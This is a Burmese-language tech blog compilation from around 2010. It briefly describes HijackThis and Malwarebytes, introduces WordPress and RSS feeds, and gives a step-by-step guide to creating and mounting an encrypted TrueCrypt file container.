ဒါလေးကတော့ အပေါ်က ပုံစံပါပဲ.. သူ့ရဲ့ ထူးခြားချက်ကတော့ file တစ်ခုခြင်းစီအတွက် ကိုယ်ပိုင် ထိန်းချုပ်မှု့ပါ၊ CPU,IO,VM တွေအပြင် performace graphed တွေပါတယ်။

Hijack This

Technician တွေနဲ့ ကွန်ပျူတာ နဲ့နည်းစပ်သူတွေတော်တော်တော်များများသိကြတဲ့ Tool ပါ။ ဒါပေမဲ့ ၄င်းတို့မှာ ပါဝင်တဲ့ R0,R1,R2,R3 / F0,F1,F2,F3 / 01 / 04 / 23 စသည့် notable entries လေးတွေကို သတိမထားမိတတ်ပါဘူး။ R0,R1,R2,R3 ဆိုတာက အင်တာနက် အွန်လိုင်း အမှားအယွင်းတွေ၊ အထူးသဖြင့် Internet Browser တွေပေါ့... အသေးစိတ်ကို


Malware Bytes

Antivirus Program တွေက ၄င်းတို့ရဲ့ Virus Signiture တွေနဲ့ငြိတဲ့ ဖိုင်တွေကို စစ်မယ်၊ Anti Spyware တွေက Registry Entries မှာ ၄င်းတို့ Spyware အဖြစ်သတ်မှတ်ထားတဲ့ ဖိုင်တွေကို စစ်မယ်။ ဒါပေမဲ့ တစ်ချို့ malware တွေကို antivirus တွေ antispyware တွေ Detect သိသော်ငြားလည်း သူတို့ကို Delete မလုပ်ဘူး( Delete လုပ်ဖို့လည်း သူတို့မှာ Power မရှိသလို၊ System File လား၊ ဘာလား မခွဲခြားနိုင်ခြင်း၊ ၄င်း malware တွေနဲ့ familiar ဖြစ်နေခြင်း)။ (မှတ်ချက် - တစ်ချို့ Antivirus program တွေက အဲ့လို malware ရရင် တွေ့သမျှ အကုန်ဖျက်ပါတယ်...ဘာဖိုင်မှကိုမထားပါဘူး။ ပြီးရင်တော့ စက်တောင် မတက်တော့ဘူး။ မိမိရဲ့ ကွန်ပျူတာက malware ကိုက်လို့ ဘာမှမဖြစ်ပဲနဲ့ Antivirus run လိုက်မှ နောက်ဆုံး ရှိတဲ့ ဖိုင်လေးတွေပါ အကုန်ပြောင်သွားတတ်ပါတယ်။) ဒါကြောင့် ၄င်း malware တွေက မိမိရဲ့ Running System နဲ့ Applications တွေကို နည်းမျိုးစုံနဲ့ဒုက္ခပေး၊ application သုံးနေရင်းနဲ့ ရုတ်တရက်ပိတ်၊ error ကျ အဲ့လိုတွေ ဖြစ်လာတတ်တယ်။ ဒီအတွက် Maleware Bytes ဆိုတဲ့ software လေးက အဆင်ပြေဆုံးပါ။

အိမ်လွမ်းသူ ဆီမှ ကူးယူဖော်ပြသည်။

အပြည့်အစုံ

WordPress အကြောင်း တစေ့တစောင်း

နိဒါန်း

ဝါ့ဒ်ပရက်စ် ကို Matt Mullenweg က ၂၀၀၃ ခုနှစ်မှာ စတင်တည်ထောင်ခဲ့ပါတယ်။ သူ့ရဲ့ ဘလော့ဂ် မှာရေးသားချက်အရ Matt ဟာ အဲဒီကာလတုန်းက ရှိတဲ့ Blogging Platform B2|Cafelo ကိုသုံးစွဲရမှု အပေါ်မှာ စိတ်ကျေနပ်မှု မရှိတဲ့ အတွက် ကိုယ်တိုင် Blogging Platform တစ်ခုကို လူအားလုံး အလွယ်တစ်ကူနဲ့ စွမ်းအင်အပြည့် အသုံးချနိုင်အောင် စတင်ရေးသားဖို့ ကြံစည်ရာက နေ WordPress ကို မွေးဖွားလာခဲ့တယ်လို့ ဆိုပါတယ်။

WordPress ကိုစတင်တည်ထောင်စဉ်က အသက် ၁၈ နှစ်သာရှိသေးတဲ့ Matt ဟာ အသက် ၂၂- အရွယ်အရောက် ၂၀၀၇ -ဇန်န၀ါရီ မှာတော့ PCWorld မဂ္ဂဇင်းရဲ့ အင်တာနက်တခွင် အရေးအကြီးဆုံး လူသား (၅၀) စာရင်း မှာ နံပါတ် (၁၆) အဖြစ် နှင့် အသက်အငယ်ဆုံး အောင်မြင်သူတစ်ဦးအဖြစ်ပါ သတ်မှတ် ရွေးချယ်ခံရပါတယ်။

WordPress ဆိုတာ....

ဝါ့ဒ်ပရက်စ် ကို WordPress.Com မှာ အကောင့်ထ် တစ်ခုလုပ် ခြင်းဖြင့် သော်လည်းကောင်း (Blogger.com ကဲ့သို့) ၊ ကိုယ်ပိုင် Premium Hosting ဒါမမဟုတ် Free Hosting တွေမှာ သော်လည်းကောင်း လွတ်လပ်လွယ်ကူစွာ အခမဲ့ ရယူအသုံးပြုနိုင်ပါတယ်။

ဖြန့်ချီပြီးခဲ့သမျှ ၀ါ့ဒ်ပရက်စ် ဗားရှင်းတွေကို ဒီနေရာ မှာ လေ့လာဖို့ အတွက် သော်လည်းကောင်း၊ သုံးစွဲဖို့ အတွက် သော်လည်းကောင်း ရယူနိုင်ပါတယ်။

အနည်းဆုံး လိုအပ်ချက်

ဝါ့ဒ်ပရက်စ် ကို ကိုယ်ပိုင် Hosting တစ်ခုခုမှာ အသုံးပြုမည့် သူများအတွက် အနည်းဆုံး အနေဖြင့် အောက်ပါ အချက်များလိုအပ်ပါတယ်။

၁။ PHP version 4.2 နှင့်အထက်

၂။ MySQL version 4.0 နှင့်အထက်

ဒီနေ့ ဒီအချိန်မှာ များသောအားဖြင့် Web Hosting အများစုဟာ PHP နှင့် MySQL တို့ကို version 5 အထိ အဆင့်မြှင့်ထားကြပြီးနေပါပြီ။ အကယ်၍ မိမိ အသုံး ပြုနေတဲ့ Hosting Services က WordPress အသုံးပြုနိုင်လောက်အောင် PHP နှင့် MySQL ကို အဆင့်မြှင့်ပေးမထားသေးရင်လည်း သူတို့ ထံကို အကြောင်းကြား တောင်းဆိုသင့်ပါတယ်။

အသုံးပြုခွင့်လိုင်စင်

ဝါ့ဒ်ပရက်စ် ဟာ OpenSource Software တစ်ခုဖြစ်တာနဲ့ အညီ စိတ်ပါဝင်စားသူ မည်သူမဆိုက ထပ်မံဖွံ့ဖြိုး တိုးတက်အောင် လုပ်ဆောင်နိုင်၊ အခမဲ့ အသုံးပြုနိုင်ပြီး မည်သူမဆို အခမဲ့ရယူ အသုံးပြုနိုင်ပါတယ်။

ဖြန့်ချီတဲ့ လိုင်စင်အမျိုးအစားကတော့ GPL လိုင်စင်အမျိုးအစား ဖြစ်ပါတယ်။

References;WikiPedia,WordPress.ORG,PCWorld, Photo Matt, wordpressmyanmar.com

အပြည့်အစုံ

RSS ဆိုတာဘာလည်း?

RSS ဆိုတာ File တစ်ခုပါပဲ။ သူရဲ့အရှည်ခေါက်က Really Simple Syndication လို့ ခေါ်ပါတယ်။RSS ဆိုတာ သန်းပေါင်းများစွာသော user များက မိမိတို့နှစ်သက်ရာ website များရဲ့ update news များကို စောင့်ကြည့် ဖတ်ရှုသည့် နည်းစနစ်တစ်ခုဖြစ်ပြီး ၊ user များအနေနဲ့ ကိုယ်ပိုင် website များ page များ ဖန်တီး နိုင်တဲ့ web 2.0 စနစ်ပီပြင်လာတဲ့ ယနေ့မှာ RSS စနစ်ဟာလဲ တွင်ကျယ်လာပါတော့တယ်။RSS မှာ အကျဉ်း ချုပ် (summary) မျှသာ ပါဝင်နိုင် သလို အခြား နောက်ဆုံးရ သတင်းအချက်အလက်အပြည့်အစုံလဲ ပါဝင်နိုင်ပါတယ်။ဒါပေမဲ့ ဒီပေါ့ပါးပြီး လျှင်မြန်မှု့ကို ပေးစွမ်းနိုင်တဲ့ အကျဉ်းချုပ် ဖော်ပြချက်လေးတွေကိုကြည့်ရှုပြီး ဒီသတင်း အချက် အလက်တွေဟာ ကိုယ့်အတွက် အသုံးဝင်မှု့ ရှိမရှိ ဆုံးဖြတ်နိုင်ပြီး .ချက်ချင်းဖတ်ရှုသင့်တဲ့ သတင်းအချက် အလက် မျိုးလား ၊ အေးဆေးဆေးဆေးနဲ့ အချိန်ယူပြီး ဖတ်ရှုလေ့လာသင့်တဲ့ သတင်းအချက်အလက် မျိုးလား ဆိုတာ လွယ်ကူစွာ ခွဲခြားနိုင်မှာ ဖြစ်ပါတယ် ။ ပုံမှန်အားဖြင့် RSS feed တစ်ခုမှာ မူလ website များမှ update လုပ်လိုက်တဲ့ သတင်း ခေါင်းစဉ်များ ပါလေ့ရှိပြီ ဒါဟာပဲ မူလ website ရဲ့လင့်ပဲဖြစ်ပါတယ်။

RSS ရဲ့အကျိုးကျေးဇူးများ
******************
၁။ RSS ဟာ အသုံးပြု စာဖတ်သူ users များကိုသာမက web publishers,bloggers များကိုပါ အကျိုးကျေးဇူး များစွားပေးစွမ်းပါတယ် ။ RSS ကရာသီဥတု၊အနုပညာ၊ အားကစား၊software upgrades,local news စတဲ့ မည်သည့် သတင်းပိုင်းဆိုင်ရာကို မဆို အချိန်နဲ့ တစ်ပြေးညီ ဖော်ပြပေးနိုင်ပါတယ် ။

၂။ RSS Feed တွင် သက်ဆိုရင်ရာသတင်းအချက်အလက်များနဲ့ ဆက်စပ်ပက်သက်မှု့ ရှိသော အချက်အလက် များကိုလဲ ဖော်ပြပေး သောကြောင့် User များရဲ့ အင်တာနက်အသုံးပြုကို လျှင် မြန်ချောမွေ့စေပြီး အချိန်ကုန် သက်သာစေမှာဖြစ်ပါတယ် .။

၃။ Users များအနေနဲ့ မိမိ feed မှာ မည်သည့် website ကို subscribe လုပ်မည်လဲ လွတ်လပ် စွာ ရွေးချယ်နိုင် ခွင့်ရှိပြီး အသုံးမ၀င် မနှစ်သက်ပါက အချိန်မရွေးပြန်လည်ဖြုတ်ချ ပြင်ဆင်နိုင်ခွင့် ရှိပါတယ် ။

၎။ ဒီလို up to date သတင်းအချက်အလက်များကို ပုံမှန်ရရှိစေရန် သက်ဆိုင်ရာ website များ တွင် subscribe လုပ်ရာမှာ email လိုအပ်ပေမဲ့ ဒီ Service system က updates များကို deliver လုပ်ရာမှာ သင့်မေးကို အသုံးပြု စေမှာ မဟုတ်ပါဘူး။

၅။ RSS ရဲ့ Email Subscriptions စနစ်ဟာ သင့်မေး၏ လုံခြုံရေးကို ထိပါးနိုင်တဲ့ spam ဆန် ဆန် မေးများအဖြစ် ၀င်ရောက်လာ မှာ မဟုတ်ပါဘူး။

၆။ ဒီ Subscription စနစ်ကိုမကြိုက်နှစ်သက်ပါက update အောက်ဆုံးမှာ unsubscription ပြုလုပ်ရန် စာတစ် ကြောင်း အမြဲတမ်း ပါလေ့ရှိပြီး user စိတ်ကြိုက် ဒီစနစ်ကို ရပ်တန့်စေ နိုင်ပါ တယ် ။

၇။ website owner များအနေနဲ့ ဒီစနစ်ကိုအသုံးပြုပြီး မိမိ ဆိုဒ်ကို Subscribe လုပ်သူများ လာ တာနဲ့အမျှ မိမိရဲ့ နောက်ဆုံးပေါ် products များကို အလိုလိုကြေငြာပြီးသား ဖြစ်မှာပါ ။

RSS အသုံးပြုခြင်း၏ ဆိုးကျိုးများ
**********************
RSS ရဲ့အဓိက ဆိုးကျိုးကတော့ နည်းပညာအသစ်အဆန်းများ နှင့် user များရဲ့ဦးစားပေး အလေးထား စိတ်ဝင် စားမှု့တို့ကို ခိုးယူ၊ ကော်ပီ ခံရမှု့ပဲဖြစ်ပါတယ်။ အခြားအချက်များကတော့ ……….

၁။ အချို့ users များမှာ တကယ် update လုပ်တဲ့အရေအတွက်ထက် ပိုပြီး email များ ရောက်ရှိ လာတက်ခြင်း ။

၂။ RSS feed မှာ သက်ဆိုင်ရာ webs များမှ update လုပ်လိုက်သော posts များတွင် ပါဝင် သော ဂရပ်ဖစ်နှင့် ဓာတ်ပုံဆိုင်ရာများ ဖော်ပြမပေးနိုင်တဲ့အတွက် သတင်းအရသာအပြည့်အ၀ မခံစားနိုင်ခြင်း။

၃။ RSS Feed တွင် မူလ website များရဲ့ URL များကို မဖော်ပြထားတာကြောင့် တစ်ခါတရံမှာ user အနေနဲ့ ဘယ် feed ကို ဖတ် နေရမှန်းမသိ ရှုပ်ထွေးမှု့ကိုဖြစ် ပေါ်စေပါတယ် ။

၎။ Publisher များအနေနဲ့ မိမိတို့ရဲ့ အချက်အလက်များကို User မည်မျှက အကြိမ် မည်မျှ ၀င် ရောက် ဖတ်ရှုခဲ့ပြီးပြီ ဆိုတာကို မခန့်မှန်းနိုင်သလို အရေးကြီးဆုံးဖြစ်တဲ့ user များမှ ဘာ ကြောင့် unsubscribe လုပ်ကြတာလဲဆိုတဲ့ အကြောင်းပြချက်ကို မသိနိုင် တာပါပဲ ။

၅။ RSS feed စနစ်ဟာ server ပေါ်မှာ traffic rate ကိုမြင့်တက်စေပြီး ..ယနေ့ website တော် တော်များများမှာ RSS စနစ် ပါဝင် လာကြပေမဲ့ RSS ကို supportမလုပ်နိုင်တဲ့ Website များစွာ လဲ ယနေ့တိုင်ရှိနေဆဲပါပဲ ။

အပြည့်အစုံ

Saturday 18 September 2010

Files တွေကို လုံခြုံတဲ့ နည်းနဲ့ သိမ်းနိုင်ဖို့ TrueCrypt Container

မိမိကွန်ပျူတာတဲ့ အချက်အလက်တွေကို သူများ အလွယ်တကူမကြည့်နိုင်အောင်၊ ခိုးယူသုံးစွဲလို့မရအောင်၊ လုံခြုံစိတ်ချအောင် TrueCrypt Container ကို ဘယ်လို အသုံးအပြုမလဲဆိုတာကို ပုံတွေနဲ့တကွ အသေးစိတ် ဖော်ပြထားပါတယ်။ အခု TrueCrypt Container ကို ကိုတင်အေးမှ ဘာသာပြန် ဖော်ပြ ပေးထားတာ ဖြစ်ပါတယ်။

လက်တွေ့အသုံးပြုနည်း အခြေခံအဆင့်
ဖိုင်တွေကို လုံခြုံစိတ်ချရတဲ့ နည်းနဲ့ သိမ်းနိုင်ဖို့ TrueCrypt Container (ထရုခရစ် သိုလှောင်ရာနေရာ) ကို ဘယ်လိုပြုလုပ်မလဲ၊ ဘယ်လိုအသုံးပြုမလဲ
ဒီအခန်းမှာ ထရုခရစ်သိုလှောင်နေရာကို ဘယ်လို ပြုလုပ်ရမလဲ၊ ဘယ်လိုဖွင့်ရမလဲ၊ ဘယ်လို အသုံးပြုရမလဲဆိုတာကို အဆင့်ဆင့် ရှင်းပြသွားပါမယ်။ အခုလမ်းညွှန်မှာ ပါဝင်တဲ့ တခြား အပိုင်းများဟာလည်း အရေးကြီးတဲ့ အချက်တွေ ဖြစ်တာကြောင့် ဖတ်ဖြစ်အောင် ဖတ်ဘို့ အလေးအနက် တိုက်တွန်းပါတယ်။
အဆင့် (၁)
ထရုခရစ် ဆော့ဝဲလ်ကို အသုံးပြုနိုင်ဖို့ အင်တာနက်ကနေ ကိုယ့်စက်ထဲကို ဆွဲချခြင်း (downloading) နဲ့ အဲဒီပရိုဂရမ်ကို စက်ထဲမှာတပ်ဆင်ခြင်း (Installing) လုပ်ရပါမယ်။ စက်ထဲမှာ တပ်ဆင်ပြီးပြီး ဆိုရင် TrueCrypt.exe ဖိုင်ကို နှစ်ချက်ဆင့်နှိပ်ပြီးဖွင့် ဒါမှမဟုတ် ၀င်းဒိုး Start Menu ကနေလည်း ထရုခရစ် အမှတ်အသားကို နှိပ်ပြီး ဖွင့်လို့ရပါတယ်။

အဆင့် (၂)

အခု ဘေးကပုံမှာ ဖော်ပြထားသလို ထရုခရစ် ၀င်းဒိုး ပွင့်လာပါမယ်။ အဲဒီမှာ Create Volume ကို နှိပ်လိုက်ပါ။ (ပုံမှာ အလွယ်တကူ ရှာလို့ရအောင် အနီရောင် ဘောင်ခပ်ပြထား ပါတယ်။)




အဆင့် (၃)

အခု နောက်တဆင့်မှာ ထရုခရစ် ထည့်သွင်းမယ့် သိုလှောင်နေရာ ပြုလုပ်ပေးဖို့ အတွက် ထရုခရစ်သိုလှောင်နေရာ ပြုလုပ်ခြင်း ၀စ်ဇတ်ဝင်းဒိုး (TrueCrypt Volume Creation Wizard window) ဆိုတာ ပွင့်လာပါမယ်။
အဲဒီအဆင့်မှာ ထရုခရစ်ကို ဘယ်နေရာမှာ ထားမလဲဆိုတာ ရွေးချယ်နိုင်ပါတယ်။ ဖိုင် (File) တစ်ခုထဲမှာ၊ အကန့် (Partition) တစ်ခုထဲမှာ၊ သိုမှီးပစ္စည်း (Drive) တစ်ခုထဲမှာ ထရုခရစ်ထားရှိမယ့် နေရာကို သတ်မှတ်နိုင်ပါတယ်။ အဲဒီလို ထားရှိတဲ့နေရာကို ထည့်သွင်းရန်နေရာ (သို့မဟုတ်) သိုလှောင်ရန်နေရာ (Container) လို့ ခေါ်ပါတယ်။ အခု လုပ်ရမယ့် လေ့ကျင့်ခန်းမှာတော့ ၀စ်ဇတ်ဝင်းဒိုးမှာ ရွေးပေးထားတဲ့ Create a file container ကို ရွေးပြီး၊ ဖိုင်တစ်ခုထဲမှာ ထရုခရစ် သိုလှောင်နေရာကို ပြုလုပ်ပါမယ်။
အခုအဆင့်ကိုလုပ်ဖို့ ပရိုဂရမ်က Create a file container ကို အသင့်ရွေးချယ်မှု လုပ်ပေးထားတဲ့အတွက် အနီရောင် ဘောင်ခပ်ပြထားတဲ့ Next ကိုသာ ဆက်နှိပ်ပါ။
မှတ်ချက် - နောက်လာမယ့် အဆင့်တွေအတွက် ရှင်းပြမယ့် ပုံတွေက ၀စ်ဇတ်ဝင်းဒိုး (Wizard Window) ရဲ့ ညာဖက်တခြမ်းတည်းကိုသာ ဖော်ပြသွားပါမယ်။


အဆင့် (၄)

အခုအဆင့်မှာ သိုလှောင်နေရာကို ပုံမှန်အတိုင်း ထားရှိမှာလား၊ သာမန်အနေအထားနဲ့ မမြင်နိုင်အောင် ဖျောက်ထားမလား (hidden) ဆိုတာကို သတ်မှတ်ရပါမယ်။ ပုံမှန်ထားရှိမယ့်နေရာ အနေနဲ့ပဲ စအလုပ်လုပ် ကြည့်ပါမယ်။
ပရိုဂရမ်က ရွေးပေးထားတဲ့ အတိုင်းပဲ ထားပြီး Next ခလုတ်ကို နှိပ်ပြီး ဆက်သွားပါ။






အဆင့် (၅)

အခု ရောက်လာတဲ့ အဆင့်မှာ ထရုခရစ် ထည့်သွင်းမယ့်နေရာ ရွေးချယ်ပေးရပါမယ်။ ထရုခရစ် သတ်မှတ်တဲ့ နေရာက ပုံမှန်ဖိုင် တစ်ခုလိုပဲ နေရာ ရွှေ့ပြောင်း နိုင်တယ်၊ ကူးယူနိုင်တယ်၊ ဖျက်ပစ်နိုင်တယ်။ သူ့ကိုလည်း ဖိုင်တစ်ခုလိုပဲ ဖိုင်နာမည် ပေးရပါမယ်။ နောက်လာမယ့် အဆင့်မှာ နာမည်ပေးဖို့ လိုပါတယ်။
Select File ဆိုတာကို နှိပ်လိုက်ပါ။
ပုံမှန်အခြားဖိုင်တွေကို ပရိုဂရမ် တစ်ခုကနေ ရှာသလိုပဲ အောက်မှာ ထရုခရစ်သိုလှောင်နေရာ ပြုလုပ်ခြင်း ၀စ်ဇတ်ဝင်းဒိုး (TrueCrypt Volume Creation Wizard) ပွင့်နေပြီး အပေါ်မှာ ဖိုင်တွေ၊ ဖိုလ်ဒါတွေ ရှာဖွေပေးတဲ့ Dialog Box  တစ်ခု ထပ်ပွင့်လာပါမယ်။
အဆင့် (၆)

အပေါ်မှာ ပြထားသလို Specify Path and File Name ဆိုတဲ့ Dialog Box ပွင့်လာရင် Drive D ရဲ့ အောက်က My Document ရဲ့ အောက်ထဲမှာ (D:\My Document) My Volume ဆိုတာကို နံမယ်ပေးဖို့ အပေါ်မှာ ပြထားတဲ့ ပုံထဲကအတိုင်း လုပ်ပါမယ်။ ဒါမှမဟုတ် ကိုယ်လုပ်ချင်တဲ့ နေရာတစ်ခုကို ရွေးချယ်နိုင်ပါတယ်။ ဥပမာ- အခုဖိုင်ကို USB Drive တစ်ခုအောက်မှာ သွားထားနိုင်ပါတယ်။ အခုအထိ My Volume ဆိုတာ သုံးဖို့ အဆင်သင့် မဖြစ်သေးပါဘူး။ နောက်လာမဲ့ အဆင့်တွေမှာ ထရုခရစ်ပရိုဂရမ်က လုပ်ပေးပါလိမ့်မယ်။
အထူးသတိပြုရန် - ရှိထားပြီးသား ဖိုင်တစ်ခုကို ထရုခရစ်က လျှို့ဝှက်သင်္ကေတပြောင်းစနစ် (encrypt) မလုပ်ပေးပါ။ ရှိပြီးသားဖိုင်တစ်ခုကို ထရုခရစ် သတ်မှတ်သည့် နေရာအဖြစ် ပြောင်းလဲပါက ၄င်းဖိုင်ကို ဖိုင်အသစ်တစ်ခုအဖြစ် အစားထိုးပစ်မည် ဖြစ်ပြီး၊ ၄င်းဖိုင်အတွင်း ရေးသားမှတ်တမ်းတင်ထားမှု အားလုံးကို ဖျက်ပစ်ခံရမည်ဖြစ်သည်။ ရှိပြီးသားဖိုင်တစ်ခုကို ထရုခရစ် အတွင်း ထည့်သွင်းလိုပါက ထရုခရစ် သိုလှောင်နေရာ သတ်မှတ်ပြီးသည့် အခါမှသာ ထည့်သွင်းနိုင်သည်။ အခု လက်ရှိပြုလုပ်နေသည့် အဆင့်မှာ ထရုခရစ် သိုလှောင်နေရာ သတ်မှတ်နေခြင်းဖြစ်သည်။
မိမိနှစ်သက်ရာ နေရာတစ်ခုအောက်ကို သွားပါ။
မိမိသတ်မှတ်ချင်သည့် ဖိုင်နံမည်တစ်ခုကို File name အကွက် အတွင်း ဖြည့်ပါ။ Save ကို နှိပ်ပါ။
ဖိုင်ရှာဖွေတဲ့ Dialog Box ပျောက်သွားပါလိမ့်မယ်။
နောက်လာမယ့် အဆင့်တွေမှာ ထရုခရစ်သိုလှောင်နေရာ ပြုလုပ်ခြင်း ၀စ်ဇတ်ဝင်းဒိုး TrueCrypt Volume Creation Wizard ကနေ ဆက်သွားပါမယ်။

အဆင့် (၇)

ပုံမှာ ပြထားတဲ့အတိုင်း လမ်းကြောင်းနဲ့ ကိုယ့်ရဲ့ ထရုခရစ် သိုလှောင်နေရာ နာမည်ပေါ်ပြီဆိုရင် Next ကို နှိပ်ပါ။
(ပြထားတဲ့ လမ်းကြောင်း - D:\My Document\My Volume ပဲ ဖြစ်ပါတယ်။)





အဆင့် (၈)
ဘေးမှာ ပြထားတဲ့အတိုင်း ခုနကလုပ်ခဲ့တဲ့ သိုလှောင်နေရာ အတွက် Encryption Algorithm နဲ့ Hash Algorithm ဆိုတာ တွေကို ရွေးချယ်ပေးရပါမယ်။ ဘယ်ဟာကို ရွေးချယ်ရမယ်ဆိုတာ မသိရင် ပရိုဂရမ်က ရွေးထားပေးတဲ့အတိုင်း ထားပြီး Next ကို ဆက်နှိပ်၊ နောက်အဆင့်ကို ဆက်သွားပါ။ (အဲဒီအချက်အလက် အသေးစိတ်ကို လေ့လာချင်ရင် Encryption Algorithms နဲ့ Hash Algorithms ဆိုတဲ့ နောက်ဆက်တွဲ အခန်းတွေမှာ ဖတ်ရှုနိုင်ပါတယ်။)

အဆင့် (၉)
အခုအဆင့်မှာ ကိုယ်လုပ်မယ့် ထရုခရစ် သိုလှောင်ရန်နေရာကို ဘယ်လောက် အရွယ်အစား ထားမယ်ဆိုတာကို သတ်မှတ်ပေးရပါမယ်။ အပေါ်မှာ ပြထားတဲ့ ဥပမာလို တစ်မီဂါဗိုက် သတ်မှတ် ကြည့်ရအောင်။ ကိုယ်ကြိုက်နှစ်သက် သလောက် အရွယ်ကို သတ်မှတ်နိုင်ပါတယ်။ ကိုယ်လိုချင်တဲ့ အရွယ်ပမာဏကို ပေးဖို့ ပေးထားတဲ့ အကွက်မှာ ဖြည့်ပေး ရပါမယ်။ (အနီရောင် ဘောင်ကွပ် ပြထားပါတယ်။) ပြီးရင် Next ကို နှိပ်ပါ။




အဆင့် (၁၀)
အခုအဆင့်က အရေးကြီးပါတယ်။ ကိုယ့်အတွက် စိတ်အချရဆုံး စကားဝှက်တစ်ခု ပေးရပါမယ်။
အောက်ပိုင်းမှာ ရေးထားတဲ့ ညွန်ကြားချက်က စိတ်အချရဆုံး၊ အသင့်တော်ဆုံး စကားဝှက်ကို ဘယ်လို သတ်မှတ်မလဲဆိုတာ ရေးသားထား ပါတယ်။ အသေအချာ ဖတ်ပါ။
စကားဝှက်ကို ရွေးပြီးပြီဆိုရင် ပထမပေးထားတဲ့ အကွက်မှာ ဖြည့်ပါ။ အဲဒီ စကားဝှက်ကိုပဲ အောက်က ဒုတိယအကွက်မှာ နောက်တစ်ကြိမ် ထပ်ဖြည့်ပါ။ Next ကို ဆက်နှိပ်ပါ။
မှတ်ချက် - စကားဝှက်မှားနေခဲ့ရင် Next ခလုတ်က အလုပ်လုပ်မှာ မဟုတ်ပါဘူး။ စကားဝှက် နှစ်ခုစလုံးတူမှ နှိပ်လို့ရပါလိမ့်မယ်။
အဆင့် (၁၁)
လှို့ဝှက်သင်္ကေတများဖြင့် ပုံဖျက်ပေးသောစနစ် ကနေ Encryption Key တစ်ခု ပြုလုပ်ပေးနေပါတယ်။ အခုလို လုပ်ပေးနေတဲ့ အချိန်မှာ မောက်စ်ကို အနည်းဆုံး စက္ကန့် (၃၀) လောက်အတွင်း ရွှေ့နိုင်သလောက် နေရာရွှေ့ပေးပါ။ များများရွှေ့ပေးနိုင်လေ ပုံဖျက်ပေးမယ့်စနစ် အားကောင်းလေလေ ဖြစ်ပါတယ်။ (လုံခြုံစိတ်ချရမှု ပိုကောင်းစေပါတယ်။)
Format ခလုတ်ကို နှိပ်ပါ။
Format ခလုတ်ကို နှိပ်ပြီဆိုတာနဲ့ ထရုခရစ်သိုလှောင်နေရာက စတင် ပြုလုပ်ပေးပါလိမ့်မယ်။ အဆင့် (၆) မှာတုန်းက သတ်မှတ်ခိုင်းတဲ့ လမ်းကြောင်းအတိုင်း D:\My Documents\ အောက်မှာ My Volume ကို စတင်ပြုလုပ် ပေးပါလိမ့်မယ်။ အခုရလာမယ့် ဖိုင်က ထရုခရစ် သိုလှောင်ရန်နေရာ ဖြစ်ပါတယ်။ အဲဒီသိုလှောင်နေရာမှာ လှို့ဝှက်သင်္ကေတများဖြင့် ပုံဖျက်ပေးသောစနစ် ထိန်းသိမ်းပေးမှာပါ။ ကိုယ်သတ်မှတ်ခဲ့တဲ့ သိုလှောင်မယ့် အရွယ်ပမာဏပေါ် မူတည်ပြီး ပြုလုပ်ပေးတဲ့ အချိန်ကြာမြင့်တက်ပါတယ်။ ပြုလုပ်ပြီးပြီဆိုတာနဲ့ အောက်မှာ ဖော်ပြထားတဲ့ Dialog Box ပေါ်လာပါလိမ့်မယ်။

OK ကို နှိပ်ပြီး အဲဒီ Dialog Box  ကို ပိတ်လိုက်ပါ။

အဆင့် (၁၂)
အခု ဖိုင်တွေကို လုံလုံခြုံခြုံသိမ်းနိုင်ဖို့ ထရုခရစ်သိုလှောင်နေရာ တစ်ခု ပြုလုပ်ပြီးပါပြီ။
Exit ခလုတ်ကို နှိပ်ပြီး ထရုခရစ်သိုလှောင်နေရာ ပြုလုပ်ခြင်းဝစ်ဇတ် ကနေ ထွက်လို့ရပါပြီ။ ထရုခရစ်သိုလှောင်နေရာပြုလုပ်ခြင်းအဆင့် ပျောက်သွားပါမယ်။
အခုနောက်လာမယ့် အဆင့်တွေမှာ ခုနက ပြုလုပ်ခဲ့တဲ့ သိုလှောင်နေရာကို ဘယ်လို ပြန်ဖွင့်မလဲ ဆိုတာ လေ့လာရပါမယ်။ ထရုခရစ်ပရိုဂရမ်မှာ ပြန်ဖွင့်ကြည့်ပါမယ်။ (ထရုခရစ် ဖွင့်လျက် အနေအထား မရှိနေရင် အဆင့် ၁ မှာ ဖွင့်ခဲ့သလို ပြန်ဖွင့်ပါ။ Install ထပ်လုပ်စရာ မလိုပါ။ ပြီးရင် အဆင့် ၁၃ ကို ဆက်သွားပါမယ်။)

အဆင့် (၁၃)

ပုံမှာ ပြထားတဲ့အတိုင်း အနီရောင် ဘောင်ကွပ်ထားတဲ့ Drive ကို ရွေးပါ။ ထရုခရစ် သိုလှောင်နေရာကို ပြန်ဖွင့်ခိုင်းဖို့ပါ။
မှတ်ချက် - အခုပြထားတဲ့ ပုံမှာ Drive M ကို နမူနာအနေဖြင့် ရွေးပြတာပါ။ အခြားကြိုက်နှစ်သက်ရာ Drive တစ်ခုကို ရွေးချယ်နိုင်ပါတယ်။





အဆင့် (၁၄)

ပြီးရင် အပေါ်မှာ ပြထားသလို Select File ကို နှိပ်ပါ။
အဲဒီမှာ ဖိုင်ပြန်ရှာတဲ့ Dialog Box ပွင့်လာပါလိမ့်မယ်။


အဆင့် (၁၅)

အခုဖိုင်ပြန်ရှာမယ့် Dialog Box မှာ (အဆင့် ၆ ကနေ ၁၁ အထိ) လုပ်ထားခဲ့တဲ့ ထရုခရစ် သိုလှောင်နေရာကို ပြန်ရှာပါမယ်။ တွေ့ရင် ရွေးလိုက်ပါ။
Open ကို နှိပ်ပါ။
ဖိုင်ရှာတဲ့ Dialog Box ပျောက်သွားပါမယ်။
ထရုခရစ် ပရိုဂရမ်ကို ပြန်ရောက်လာမယ်။


အဆင့် (၁၆)

အဲဒီ ထရုခရစ်ဝင်းဒိုးမှာ Mount ဆိုတာကို နှိပ်ပါ။
စကားဝှက် ဖြည့်ပေးဖို့ Dialog  Box ပွင့်လာပါမယ်။


အဆင့် (၁၇)

ခုနက အဆင့် (၁၀) မှာ ဖြည့်ထားခဲ့တဲ့ စကားဝှက်ကို စကားဝှက်ထည့်သွင်းဖို့ ပေးထားတဲ့အကွက်မှာ ပြန်ရိုက်ပါ။ (အနီရောင် ဘောင်ကွပ်ပြထားပါတယ်။)




အဆင့် (၁၈)

ဖြည့်ပြီးရင် OK ကို နှိပ်ပါ။
